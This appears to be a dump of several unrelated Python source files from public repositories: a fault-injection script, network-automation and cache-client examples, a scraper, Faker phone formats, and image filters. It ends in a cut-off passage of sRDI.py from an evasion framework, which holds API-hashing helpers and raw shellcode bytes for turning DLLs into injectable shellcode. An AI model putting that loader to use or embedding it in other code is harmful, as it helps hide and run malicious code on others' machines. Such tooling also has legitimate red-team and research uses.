RESPONSES={ 200: 'OK', 400: 'Bad request', 500: 'Server error' }
def add_fault(hosts, options):
print('Adding fault: ' + json.dumps(options))
for host in hosts:
print('Adding fault to ' + host),
conn=httplib.HTTPConnection(host, 6660)
conn.request('POST', '/', json.dumps(options), { 'Content-Type': 'application/json' })
response=conn.getresponse()
data=response.read()
conn.close()
print(': ' + RESPONSES[response.status])
if response.status != 200:
print(data)
def reset_hosts(hosts, options):
for host in hosts:
print('Resetting host ' + host),
conn=httplib.HTTPConnection(host, 6660)
conn.request('DELETE', '/')
response=conn.getresponse()
data=response.read()
conn.close()
print(': ' + RESPONSES[response.status])
if response.status != 200:
print(data)
ACTIONS={'add': add_fault,
'reset': reset_hosts
}
option_parser=OptionParser(usage="Usage: %prog <action> [options]\n\n\
Valid actions: add, reset")
option_parser.add_option('-n', '--name', dest='name', help='A name for the rule', default='(no-name)')
option_parser.add_option('-f', '--from', dest='from', help='Limit rule to packets coming from this host')
option_parser.add_option('-t', '--to', dest='to', help='Limit rule to packets to this host')
option_parser.add_option('-p', '--to_port', dest='to_port', type='int')
option_parser.add_option('-d', '--direction', dest='direction')
option_parser.add_option('-F', '--fault_type', dest='type', help="Valid types: " + ", ".join(FAULT_TYPES.keys()))
option_parser.add_option('-l', '--delay', dest='delay', type='int', help='Delay in milliseconds. Only valid with fault type DELAY.')
option_parser.add_option('-v', '--variance', dest='variance', type='int', help='Delay variance in milliseconds. Only valid with fault type DELAY.')
option_parser.add_option('-c', '--correlation', dest='correlation', type='int', help='Percent delay or packet loss correlation. Only valid with fault type DELAY or PACKET_LOSS.')
option_parser.add_option('-D', '--distribution', dest='distribution', help='Delay distribution type. Valid types: uniform, normal, pareto, paretonormal. Only valid with fault type DELAY.')
option_parser.add_option('-r', '--protocol', dest='protocol', help='Default is TCP')
option_parser.add_option('-P', '--probability', dest='probability', type='int', help='Packet loss probability. Only valid with fault type PACKET_LOSS.')
option_parser.add_option('-T', '--timeout', dest='timeout', type='int', help='TCP connection timeout. Only valid when used with fault type FIREWALL_TIMEOUT.')
option_parser.add_option('-H', '--hosts', dest='hosts', help='Hosts for this client/service', default='127.0.0.1')
(options, args)=option_parser.parse_args()
if len(sys.argv) < 2:
option_parser.print_help()
sys.exit(2)
if len(args) < 1:
print("Error: action required. Valid options: " + str(ACTIONS.keys()))
sys.exit(2)
action=args[0]
print("action: "+ action)
if action not in ACTIONS.keys():
print('Valid actions: ' + ", ".join(ACTIONS.keys()))
sys.exit(2)
hosts = options.hosts.split(',')
fault_params = dict(filter(lambda (k,v): k != 'hosts' and v is not None, options.__dict__.items()))
#print("Action: " + action + ". Options: " + str(options))
action_fn=ACTIONS[action]
action_fn(hosts, fault_params)
|
examples/basic_usage/generic_driver.py
|
verbosemode/scrapli
| 404 |
85071
|
"""examples.basic_usage.generic_driver"""
from scrapli.driver import GenericDriver
MY_DEVICE = {
"host": "172.18.0.11",
"auth_username": "scrapli",
"auth_password": "<PASSWORD>",
"auth_strict_key": False,
}
def main():
"""Simple example of connecting to an IOSXEDevice with the GenericDriver"""
# the `GenericDriver` is a good place to start if your platform is not supported by a "core"
# platform drivers
conn = GenericDriver(**MY_DEVICE)
conn.open()
print(conn.channel.get_prompt())
print(conn.send_command("show run | i hostname").result)
# IMPORTANT: paging is NOT disabled w/ GenericDriver driver!
conn.send_command("terminal length 0")
print(conn.send_command("show run").result)
conn.close()
# Context manager is a great way to use scrapli, it will auto open/close the connection for you:
with GenericDriver(**MY_DEVICE) as conn:
result = conn.send_command("show run | i hostname")
print(result.result)
if __name__ == "__main__":
main()
|
src/zvt/tag/tag.py
|
vishalbelsare/zvt
| 2,032 |
85099
|
<filename>src/zvt/tag/tag.py
# -*- coding: utf-8 -*-
import logging
from typing import Type
import pandas as pd
from zvt.contract import Mixin
from zvt.contract import TradableEntity
from zvt.contract.api import get_db_session
from zvt.contract.base import OneStateService
from zvt.contract.zvt_info import TaggerState
from zvt.domain import Stock, Index
from zvt.tag.dataset.stock_tags import StockTags
from zvt.utils import to_time_str, to_pd_timestamp
from zvt.utils.time_utils import TIME_FORMAT_DAY, now_pd_timestamp
logger = logging.getLogger(__name__)
class Tagger(OneStateService):
state_schema = TaggerState
entity_schema: Type[TradableEntity] = None
data_schema: Type[Mixin] = None
start_timestamp = "2005-01-01"
def __init__(self, force=False) -> None:
super().__init__()
assert self.entity_schema is not None
assert self.data_schema is not None
self.force = force
self.session = get_db_session(provider="zvt", data_schema=self.data_schema)
if self.state and not self.force:
logger.info(f"get start_timestamp from state")
self.start_timestamp = self.state["current_timestamp"]
logger.info(f"tag start_timestamp: {self.start_timestamp}")
def tag(self, timestamp):
raise NotImplementedError
def get_tag_timestamps(self):
return pd.date_range(start=self.start_timestamp, end=now_pd_timestamp(), freq="M")
def get_tag_domain(self, entity_id, timestamp, **fill_kv):
the_date = to_time_str(timestamp, fmt=TIME_FORMAT_DAY)
the_id = f"{entity_id}_{the_date}"
the_domain = self.data_schema.get_one(id=the_id)
if the_domain:
for k, v in fill_kv.items():
exec(f"the_domain.{k}=v")
else:
return self.data_schema(id=the_id, entity_id=entity_id, timestamp=to_pd_timestamp(the_date), **fill_kv)
return the_domain
def get_tag_domains(self, entity_ids, timestamp, **fill_kv):
the_date = to_time_str(timestamp, fmt=TIME_FORMAT_DAY)
ids = [f"{entity_id}_{the_date}" for entity_id in entity_ids]
the_domains = self.data_schema.query_data(ids=ids, return_type="domain")
if the_domains:
for the_domain in the_domains:
for k, v in fill_kv.items():
exec(f"the_domain.{k}=v")
current_ids = [item.id for item in the_domains]
need_new_ids = set(ids) - set(current_ids)
new_domains = [
self.data_schema(
id=f"{entity_id}_{the_date}", entity_id=entity_id, timestamp=to_pd_timestamp(the_date), **fill_kv
)
for entity_id in need_new_ids
]
return the_domains + new_domains
def run(self):
timestamps = self.get_tag_timestamps()
for timestamp in timestamps:
logger.info(f"tag to {timestamp}")
self.tag(timestamp=timestamp)
self.state = {"current_timestamp": to_time_str(timestamp)}
self.persist_state()
class StockTagger(Tagger):
data_schema = StockTags
entity_schema = Stock
def tag(self, timestamp):
raise NotImplementedError
class IndexTagger(Tagger):
data_schema = StockTags
entity_schema = Index
def tag(self, timestamp):
raise NotImplementedError
# the __all__ is generated
__all__ = ["Tagger", "StockTagger", "IndexTagger"]
|
thirdparty/asyncio/examples/cacheclt.py
|
xan4/sa-nv
| 402 |
85112
|
<gh_stars>100-1000
"""Client for cache server.
See cachesvr.py for protocol description.
"""
import argparse
import asyncio
from asyncio import test_utils
import json
import logging
ARGS = argparse.ArgumentParser(description='Cache client example.')
ARGS.add_argument(
'--tls', action='store_true', dest='tls',
default=False, help='Use TLS')
ARGS.add_argument(
'--iocp', action='store_true', dest='iocp',
default=False, help='Use IOCP event loop (Windows only)')
ARGS.add_argument(
'--host', action='store', dest='host',
default='localhost', help='Host name')
ARGS.add_argument(
'--port', action='store', dest='port',
default=54321, type=int, help='Port number')
ARGS.add_argument(
'--timeout', action='store', dest='timeout',
default=5, type=float, help='Timeout')
ARGS.add_argument(
'--max_backoff', action='store', dest='max_backoff',
default=5, type=float, help='Max backoff on reconnect')
ARGS.add_argument(
'--ntasks', action='store', dest='ntasks',
default=10, type=int, help='Number of tester tasks')
ARGS.add_argument(
'--ntries', action='store', dest='ntries',
default=5, type=int, help='Number of request tries before giving up')
args = ARGS.parse_args()
class CacheClient:
"""Multiplexing cache client.
This wraps a single connection to the cache client. The
connection is automatically re-opened when an error occurs.
Multiple tasks may share this object; the requests will be
serialized.
The public API is get(), set(), delete() (all are coroutines).
"""
def __init__(self, host, port, sslctx=None, loop=None):
self.host = host
self.port = port
self.sslctx = sslctx
self.loop = loop
self.todo = set()
self.initialized = False
self.task = asyncio.Task(self.activity(), loop=self.loop)
@asyncio.coroutine
def get(self, key):
resp = yield from self.request('get', key)
if resp is None:
return None
return resp.get('value')
@asyncio.coroutine
def set(self, key, value):
resp = yield from self.request('set', key, value)
if resp is None:
return False
return resp.get('status') == 'ok'
@asyncio.coroutine
def delete(self, key):
resp = yield from self.request('delete', key)
if resp is None:
return False
return resp.get('status') == 'ok'
@asyncio.coroutine
def request(self, type, key, value=None):
assert not self.task.done()
data = {'type': type, 'key': key}
if value is not None:
data['value'] = value
payload = json.dumps(data).encode('utf8')
waiter = asyncio.Future(loop=self.loop)
if self.initialized:
try:
yield from self.send(payload, waiter)
except IOError:
self.todo.add((payload, waiter))
else:
self.todo.add((payload, waiter))
return (yield from waiter)
@asyncio.coroutine
def activity(self):
backoff = 0
while True:
try:
self.reader, self.writer = yield from asyncio.open_connection(
self.host, self.port, ssl=self.sslctx, loop=self.loop)
except Exception as exc:
backoff = min(args.max_backoff, backoff + (backoff//2) + 1)
logging.info('Error connecting: %r; sleep %s', exc, backoff)
yield from asyncio.sleep(backoff, loop=self.loop)
continue
backoff = 0
self.next_id = 0
self.pending = {}
self. initialized = True
try:
while self.todo:
payload, waiter = self.todo.pop()
if not waiter.done():
yield from self.send(payload, waiter)
while True:
resp_id, resp = yield from self.process()
if resp_id in self.pending:
payload, waiter = self.pending.pop(resp_id)
if not waiter.done():
waiter.set_result(resp)
except Exception as exc:
self.initialized = False
self.writer.close()
while self.pending:
req_id, pair = self.pending.popitem()
payload, waiter = pair
if not waiter.done():
self.todo.add(pair)
logging.info('Error processing: %r', exc)
@asyncio.coroutine
def send(self, payload, waiter):
self.next_id += 1
req_id = self.next_id
frame = 'request %d %d\n' % (req_id, len(payload))
self.writer.write(frame.encode('ascii'))
self.writer.write(payload)
self.pending[req_id] = payload, waiter
yield from self.writer.drain()
@asyncio.coroutine
def process(self):
frame = yield from self.reader.readline()
if not frame:
raise EOFError()
head, tail = frame.split(None, 1)
if head == b'error':
raise IOError('OOB error: %r' % tail)
if head != b'response':
raise IOError('Bad frame: %r' % frame)
resp_id, resp_size = map(int, tail.split())
data = yield from self.reader.readexactly(resp_size)
if len(data) != resp_size:
raise EOFError()
resp = json.loads(data.decode('utf8'))
return resp_id, resp
def main():
asyncio.set_event_loop(None)
if args.iocp:
from asyncio.windows_events import ProactorEventLoop
loop = ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
sslctx = None
if args.tls:
sslctx = test_utils.dummy_ssl_context()
cache = CacheClient(args.host, args.port, sslctx=sslctx, loop=loop)
try:
loop.run_until_complete(
asyncio.gather(
*[testing(i, cache, loop) for i in range(args.ntasks)],
loop=loop))
finally:
loop.close()
@asyncio.coroutine
def testing(label, cache, loop):
def w(g):
return asyncio.wait_for(g, args.timeout, loop=loop)
key = 'foo-%s' % label
while True:
logging.info('%s %s', label, '-'*20)
try:
ret = yield from w(cache.set(key, 'hello-%s-world' % label))
logging.info('%s set %s', label, ret)
ret = yield from w(cache.get(key))
logging.info('%s get %s', label, ret)
ret = yield from w(cache.delete(key))
logging.info('%s del %s', label, ret)
ret = yield from w(cache.get(key))
logging.info('%s get2 %s', label, ret)
except asyncio.TimeoutError:
logging.warn('%s Timeout', label)
except Exception as exc:
logging.exception('%s Client exception: %r', label, exc)
break
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
|
locations/spiders/hopdoddy_burger_bar.py
|
boomerwv1/alltheplaces
| 297 |
85118
|
<reponame>boomerwv1/alltheplaces
# -*- coding: utf-8 -*-
import json
import re
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
class HopdoddyBurgerBarSpider(scrapy.Spider):
name = "hopdoddy_burger_bar"
allowed_domains = ["amazonaws.com"]
def start_requests(self):
base_url = "https://na6c0i4fb0.execute-api.us-west-2.amazonaws.com/restaurants/near?lat={lat}3&long={lon}"
with open('./locations/searchable_points/us_centroids_25mile_radius.csv') as points:
next(points) # Ignore the header
for point in points:
_, lat, lon = point.strip().split(',')
url = base_url.format(lat=lat, lon=lon)
yield scrapy.http.Request(url, callback=self.parse)
def parse(self, response):
data = json.loads(response.body_as_unicode())
for place in data["restaurants"]:
properties = {
'ref': place["id"],
'name': place["name"],
'addr_full': place["streetaddress"],
'city': place["city"],
'state': place["state"],
'postcode': place["zip"],
'country': place["country"],
'lat': place["latitude"],
'lon': place["longitude"],
'phone': place["telephone"]
}
yield GeojsonPointItem(**properties)
|
faker/providers/phone_number/en_GB/__init__.py
|
mgorny/faker
| 12,077 |
85158
|
from .. import Provider as PhoneNumberProvider
class Provider(PhoneNumberProvider):
# Source:
# https://en.wikipedia.org/wiki/Telephone_numbers_in_the_United_Kingdom
# Fake phone numbers should be fake - this provider has been rewritten to
# use numbers reserved for dramatic use by Ofcom. See the following:
# https://en.wikipedia.org/wiki/Fictitious_telephone_number#United_Kingdom
# This ensures no genuine numbers are generated at random.
#
# It's worth noting that the following examples include incorrect notation
# of British phone numbers. +44(0)xxx is incorrect and the '(0)' should
# be omitted. However, it's commonly written this way by Joe Public
# and would better serve this project to be included, as it represents
# more realistic data and is of benefit to those developing data cleansing
# tools etc. All possible official fake numbers are covered below.
cellphone_formats = (
'07700 900 ###',
'07700 900###',
'07700900###',
'(07700) 900 ###',
'(07700) 900###',
'(07700)900###',
'+447700 900 ###',
'+447700 900###',
'+447700900###',
'+44(0)7700 900 ###',
'+44(0)7700 900###',
'+44(0)7700900###',
)
formats = (
'0113 496 0###',
'0113 4960###',
'01134960###',
'(0113) 496 0###',
'(0113) 4960###',
'(0113)4960###',
'+44113 496 0###',
'+44113 4960###',
'+441134960###',
'+44(0)113 496 0###',
'+44(0)113 4960###',
'+44(0)1134960###',
'0114 496 0###',
'0114 4960###',
'01144960###',
'(0114) 496 0###',
'(0114) 4960###',
'(0114)4960###',
'+44114 496 0###',
'+44114 4960###',
'+441144960###',
'+44(0)114 496 0###',
'+44(0)114 4960###',
'+44(0)1144960###',
'0115 496 0###',
'0115 4960###',
'01154960###',
'(0115) 496 0###',
'(0115) 4960###',
'(0115)4960###',
'+44115 496 0###',
'+44115 4960###',
'+441154960###',
'+44(0)115 496 0###',
'+44(0)115 4960###',
'+44(0)1154960###',
'0116 496 0###',
'0116 4960###',
'01164960###',
'(0116) 496 0###',
'(0116) 4960###',
'(0116)4960###',
'+44116 496 0###',
'+44116 4960###',
'+441164960###',
'+44(0)116 496 0###',
'+44(0)116 4960###',
'+44(0)1164960###',
'0117 496 0###',
'0117 4960###',
'01174960###',
'(0117) 496 0###',
'(0117) 4960###',
'(0117)4960###',
'+44117 496 0###',
'+44117 4960###',
'+441174960###',
'+44(0)117 496 0###',
'+44(0)117 4960###',
'+44(0)1174960###',
'0118 496 0###',
'0118 4960###',
'01184960###',
'(0118) 496 0###',
'(0118) 4960###',
'(0118)4960###',
'+44118 496 0###',
'+44118 4960###',
'+441184960###',
'+44(0)118 496 0###',
'+44(0)118 4960###',
'+44(0)1184960###',
'0121 496 0###',
'0121 4960###',
'01214960###',
'(0121) 496 0###',
'(0121) 4960###',
'(0121)4960###',
'+44121 496 0###',
'+44121 4960###',
'+441214960###',
'+44(0)121 496 0###',
'+44(0)121 4960###',
'+44(0)1214960###',
'0131 496 0###',
'0131 4960###',
'01314960###',
'(0131) 496 0###',
'(0131) 4960###',
'(0131)4960###',
'+44131 496 0###',
'+44131 4960###',
'+441314960###',
'+44(0)131 496 0###',
'+44(0)131 4960###',
'+44(0)1314960###',
'0141 496 0###',
'0141 4960###',
'01414960###',
'(0141) 496 0###',
'(0141) 4960###',
'(0141)4960###',
'+44141 496 0###',
'+44141 4960###',
'+441414960###',
'+44(0)141 496 0###',
'+44(0)141 4960###',
'+44(0)1414960###',
'0151 496 0###',
'0151 4960###',
'01514960###',
'(0151) 496 0###',
'(0151) 4960###',
'(0151)4960###',
'+44151 496 0###',
'+44151 4960###',
'+441514960###',
'+44(0)151 496 0###',
'+44(0)151 4960###',
'+44(0)1514960###',
'0161 496 0###',
'0161 4960###',
'01614960###',
'(0161) 496 0###',
'(0161) 4960###',
'(0161)4960###',
'+44161 496 0###',
'+44161 4960###',
'+441614960###',
'+44(0)161 496 0###',
'+44(0)161 4960###',
'+44(0)1614960###',
'0191 498 0###',
'0191 4960###',
'01914960###',
'(0191) 496 0###',
'(0191) 4960###',
'(0191)4960###',
'+44191 496 0###',
'+44191 4960###',
'+441914960###',
'+44(0)191 496 0###',
'+44(0)191 4960###',
'+44(0)1914960###',
'020 7946 0###',
'020 74960###',
'02074960###',
'(020) 7496 0###',
'(020) 74960###',
'(020)74960###',
'+4420 7496 0###',
'+4420 74960###',
'+442074960###',
'+44(0)20 7496 0###',
'+44(0)20 74960###',
'+44(0)2074960###',
'028 9018 0###',
'028 9018###',
'0289018###',
'(028) 9018 0###',
'(028) 9018###',
'(028)9018###',
'+4428 9018 0###',
'+4428 9018###',
'+44289018###',
'+44(0)28 9018 0###',
'+44(0)28 9018###',
'+44(0)289018###',
'029 2018 0###',
'029 2018###',
'0292018###',
'(029) 2018 0###',
'(029) 2018###',
'(029)2018###',
'+4429 2018 0###',
'+4429 2018###',
'+44292018###',
'+44(0)29 2018 0###',
'+44(0)29 2018###',
'+44(0)292018###',
'01632 960 ###',
'01632 960###',
'01632960###',
'(01632) 960 ###',
'(01632) 960###',
'(01632)960###',
'+441632 960 ###',
'+441632 960###',
'+441632960###',
'+44(0)1632 960 ###',
'+44(0)1632 960###',
'+44(0)1632960###',
'0306 999 0###',
'0306 9990###',
'03069990###',
'(0306) 999 0###',
'(0306) 9990###',
'(0306)9990###',
'+44306 999 0###',
'+44306 9990###',
'+443069990###',
'+44(0)306 999 0###',
'+44(0)306 9990###',
'+44(0)3069990###',
'0808 157 0###',
'0808 1570###',
'08081570###',
'(0808) 157 0###',
'(0808) 1570###',
'(0808)1570###',
'+44808 157 0###',
'+44808 1570###',
'+448081570###',
'+44(0)808 157 0###',
'+44(0)808 1570###',
'+44(0)8081570###',
'0909 879 0###',
'0909 8790###',
'09098790###',
'(0909) 879 0###',
'(0909) 8790###',
'(0909)8790###',
'+44909 879 0###',
'+44909 8790###',
'+449098790###',
'+44(0)909 879 0###',
'+44(0)909 8790###',
'+44(0)9098790###',
)
def cellphone_number(self) -> str:
pattern: str = self.random_element(self.cellphone_formats)
return self.numerify(self.generator.parse(pattern))
|
halogen/halogen.py
|
wroersma/halogen
| 174 |
85160
|
<reponame>wroersma/halogen<filename>halogen/halogen.py<gh_stars>100-1000
# coding=utf-8
""" The mfbot Python3 CLI script """
from mfbot import MFBot
def main() -> None:
""" Main function to start things up for the command line use of mfbot """
mfbot = MFBot()
mfbot.parse_args()
if mfbot.dir:
yara_rule_output = mfbot.dir_run()
if len(yara_rule_output) > 0:
mfbot.print_yara_rule(yara_rule_output)
else:
print("No images found within that directory")
else:
yara_rule_output = mfbot.run()
if len(yara_rule_output) > 0:
mfbot.print_yara_rule(yara_rule_output)
else:
print('No image found.')
if __name__ == "__main__":
main()
|
airlab/utils/imageFilters.py
|
jlevy44/airlab
| 330 |
85162
|
# Copyright 2018 University of Basel, Center for medical Image Analysis and Navigation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import multiprocessing as mp
os.environ["ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS"] = str(mp.cpu_count())
import SimpleITK as sitk
import numpy as np
import torch as th
from .image import Image
def auto_crop_image_filter(image, boundary_value=0):
"""
Performs an auto cropping of values on boundary
image (Image): image which has to be cropped
boundary_value (float|int): specifies the boundary value which will be cropped
return (Image): a new image with cropped boundary
"""
msk = 1 - (image.image.squeeze() == boundary_value)
rminmax = []
for d in range(len(msk.shape)):
region = msk.argmax(dim=d).nonzero()
rminmax.append((region.min(dim=0)[0], region.max(dim=0)[0]))
#print(rminmax[-1])
if image.ndim == 2:
cropped = image.image.squeeze()[rminmax[1][0]:rminmax[1][1], rminmax[0][0]:rminmax[0][1]]
origin = image.origin + th.Tensor(image.spacing) * th.Tensor([rminmax[1][0], rminmax[0][0]])
elif image.ndim == 3:
cropped = image.image.squeeze()[rminmax[1][0][0]:rminmax[1][1][0], \
rminmax[0][0][0]:rminmax[0][1][0], \
rminmax[0][0][1]:rminmax[0][1][1]]
#print(cropped.shape)
origin = th.Tensor(image.origin) + th.Tensor(image.spacing) * th.Tensor([rminmax[1][0][0], rminmax[0][0][0],rminmax[0][0][1]])
else:
raise Exception("Only 2 and 3 space dimensions supported")
size = tuple(cropped.shape)
cropped.unsqueeze_(0).unsqueeze_(0)
return Image(cropped, size, image.spacing, origin.tolist())
def normalize_images(fixed_image, moving_image):
"""
Noramlize image intensities by extracting joint minimum and dividing by joint maximum
Note: the function is inplace
fixed_image (Image): fixed image
moving_image (Image): moving image
return (Image, Image): normalized images
"""
fixed_min = fixed_image.image.min()
moving_min = moving_image.image.min()
min_val = min(fixed_min, moving_min)
fixed_image.image -= min_val
moving_image.image -= min_val
moving_max = moving_image.image.max()
fixed_max = fixed_image.image.max()
max_val = max(fixed_max, moving_max)
fixed_image.image /= max_val
moving_image.image /= max_val
return (fixed_image, moving_image)
def remove_bed_filter(image, cropping=True):
"""
Removes fine structures from the image using morphological operators. It can be used to remove the bed structure
usually present in CT images. The resulting image and the respective body mask can be cropped with the cropping
option.
Note: the morphological operations are performed on a downsampled version of the image
image (Image): image of interest
cropping (bool): specifies if the image should be cropped after bed removal
return (Image, Image): bed-free image and a body mask
"""
# define parameters
houndsfield_min = -300
houndsfield_max = 3071
houndsfield_default = -1024
radius_opening = 3
radius_closing = 40
image_itk = image.itk()
# resample image
workingSize = np.array(image.size)
workingSize[0] /= 3
workingSize[1] /= 3
workingSpacing = np.array(image.spacing, dtype=float) * np.array(image.size, dtype=float) / np.array(workingSize, dtype=float)
resampler = sitk.ResampleImageFilter()
resampler.SetOutputOrigin(image.origin)
resampler.SetSize(workingSize.tolist())
resampler.SetOutputSpacing(workingSpacing.tolist())
resampler.SetInterpolator(2) # linear interpolation
resampler.SetNumberOfThreads(mp.cpu_count())
image_tmp = resampler.Execute(image_itk)
# threshold image
thresholder = sitk.BinaryThresholdImageFilter()
thresholder.SetOutsideValue(0)
thresholder.SetInsideValue(1)
thresholder.SetLowerThreshold(houndsfield_min)
thresholder.SetUpperThreshold(houndsfield_max)
thresholder.SetNumberOfThreads(mp.cpu_count())
image_tmp = thresholder.Execute(image_tmp)
# morphological opening with ball as structuring element
# removes thin structures as the bed
opening = sitk.BinaryMorphologicalOpeningImageFilter()
opening.SetKernelType(sitk.sitkBall)
opening.SetKernelRadius(radius_opening)
opening.SetForegroundValue(1)
opening.SetNumberOfThreads(mp.cpu_count())
image_tmp = opening.Execute(image_tmp)
# crop zero values from mask boundary
if cropping:
image_tmp = auto_crop_image_filter(Image(image_tmp).to(device=image.device)).itk()
# morphological closing with ball as structuring element
# fills up the lungs
closing = sitk.BinaryMorphologicalClosingImageFilter()
closing.SetKernelRadius(sitk.sitkBall)
closing.SetKernelRadius(radius_closing)
closing.SetForegroundValue(1)
closing.SetNumberOfThreads(mp.cpu_count())
image_tmp = closing.Execute(image_tmp)
# resample mask to original spacing
mask_size = np.array(np.array(image_tmp.GetSpacing(), dtype=float)*np.array(image_tmp.GetSize(),dtype=float)/np.array(image.spacing, dtype=float), dtype=int).tolist()
resampler = sitk.ResampleImageFilter()
resampler.SetOutputOrigin(image_tmp.GetOrigin())
resampler.SetSize(mask_size)
resampler.SetOutputSpacing(image.spacing)
resampler.SetInterpolator(1) # nearest neighbor interpolation
resampler.SetNumberOfThreads(mp.cpu_count())
bodyMask = resampler.Execute(image_tmp)
# resample also original image
resampler.SetInterpolator(2)
image_itk = resampler.Execute(image_itk)
# mask image with found label map
masking = sitk.MaskImageFilter()
masking.SetMaskingValue(0)
masking.SetOutsideValue(houndsfield_default)
masking.SetNumberOfThreads(mp.cpu_count())
outImage = masking.Execute(image_itk, bodyMask)
return (Image(outImage).to(device=image.device), Image(bodyMask).to(device=image.device))
|
inceptor/converters/sRDI.py
|
pwnmeow/inceptor
| 743 |
85170
|
<reponame>pwnmeow/inceptor<filename>inceptor/converters/sRDI.py
import base64
import struct
from converters.Transformer import Transformer
class sRDI(Transformer):
MACHINE_IA64 = 512
MACHINE_AMD64 = 34404
def __init__(self):
super().__init__()
self.flags = 0 | 0x1 | 0x4 | 30 << 16
self.function = "DllMain"
self.args = b"test"
self.filetype = "dll"
@staticmethod
def is64BitDLL(_bytes):
header_offset = struct.unpack("<L", _bytes[60:64])[0]
machine = struct.unpack("<H", _bytes[header_offset + 4:header_offset + 4 + 2])[0]
if machine == sRDI.MACHINE_IA64 or machine == sRDI.MACHINE_AMD64:
return True
return False
@staticmethod
def ror(val, r_bits, max_bits):
return ((val & (2 ** max_bits - 1)) >> r_bits % max_bits) | \
(val << (max_bits - (r_bits % max_bits)) & (2 ** max_bits - 1))
@staticmethod
def HashFunctionName(name, module=None):
function = name.encode() + b'\x00'
if module:
module = module.upper().encode('UTF-16LE') + b'\x00\x00'
function_hash = 0
for b in function:
function_hash = sRDI.ror(function_hash, 13, 32)
function_hash += b
module_hash = 0
for b in module:
module_hash = sRDI.ror(module_hash, 13, 32)
module_hash += b
function_hash += module_hash
if function_hash > 0xFFFFFFFF:
function_hash -= 0x100000000
else:
function_hash = 0
for b in function:
function_hash = sRDI.ror(function_hash, 13, 32)
function_hash += b
return function_hash
@staticmethod
def ConvertToShellcode(dll_bytes, function_hash=0x10, user_data=b'None', flags=0):
# MARKER:S
rdi_shellcode32 = b'\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00' \
b'\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00' \
b'\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A' \
b'\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89' \
b'\xAC\x24\xB0\x00\x00\x00\x89\x6C\x24\x34\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xC4\x00' \
b'\x00\x00\x89\xAC\x24\xB4\x00\x00\x00\x89\xAC\x24\xAC\x00\x00\x00\x89\xAC\x24\xE0\x00\x00' \
b'\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2' \
b'\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94' \
b'\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6' \
b'\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7' \
b'\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24' \
b'\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44' \
b'\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C' \
b'\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E' \
b'\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88' \
b'\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00' \
b'\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C' \
b'\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00' \
b'\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59' \
b'\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88\x4C\x24\x79\x88\x8C\x24' \
b'\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00' \
b'\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24' \
b'\x72\x69\x76\xC7\x44\x24\x75\x53\x79\x73\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C' \
b'\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00' \
b'\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00' \
b'\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24' \
b'\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00' \
